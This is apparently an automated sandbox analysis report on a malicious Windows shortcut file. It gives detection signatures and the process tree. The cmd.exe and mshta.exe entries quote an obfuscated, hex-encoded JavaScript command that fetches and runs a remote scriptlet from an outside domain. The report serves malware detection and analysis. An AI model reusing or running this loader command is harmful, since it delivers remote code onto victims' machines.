Windows Analysis Report
ProconGO1121082800.LnK.lnk
Overview
General Information
Detection
Score: 52 (range 0 - 100)
Whitelisted: false
Confidence: 100%
Signatures
Windows shortcut file (LNK) starts blacklisted processes
Machine Learning detection for sample
Creates a process in suspended mode (likely to inject code)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Uses a known web browser user agent for HTTP communication
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Classification
- System is w10x64
- cmd.exe (PID: 6440, cmdline: "C:\Windows\System32\cmd.exe" /c MshtA "JaVAsCrIpT:var _$_WXKH=["\x5a\x53\x46\x4d\113\x38\116","\x73\x63\162\x69\160\164\x3a\x48\x54\x74\x70\x73\x3a\x2f\x2f\x66\x6c\151\x6e\x61\x6e\x6d\x61\x6e\x73\x61\154\56\162\x6f\x75\x70\x61\x67\x75\143\x63\x69\x2e\163\x62\x73\57\x3f\x31\x2f"];try{GetObject(_$_WXKH[1])[_$_WXKH[0]]()}catch(e){};close()", MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
- conhost.exe (PID: 6900, cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, MD5: 0D698AF330FD17BEE3BF90011D49251D)
- mshta.exe (PID: 5224, cmdline: MshtA "JaVAsCrIpT:var _$_WXKH=["\x5a\x53\x46\x4d\113\x38\116","\x73\x63\162\x69\160\164\x3a\x48\x54\x74\x70\x73\x3a\x2f\x2f\x66\x6c\151\x6e\x61\x6e\x6d\x61\x6e\x73\x61\154\56\162\x6f\x75\x70\x61\x67\x75\143\x63\x69\x2e\163\x62\x73\57\x3f\x31\x2f"];try{GetObject(_$_WXKH[1])[_$_WXKH[0]]()}catch(e){};close()", MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
- cleanup
- No configs have been found
- No yara matches
- No Sigma rule has matched
- No Snort rule has matched
AV Detection
- Source: Joe Sandbox ML
Network evidence (values not preserved in this extract)
- Source: HTTPS traffic detected
- Source: IP Address
- Source: JA3 fingerprint
- Source: HTTP traffic detected
- Source: UDP traffic detected without corresponding DNS query
- Source: String found in binary or memory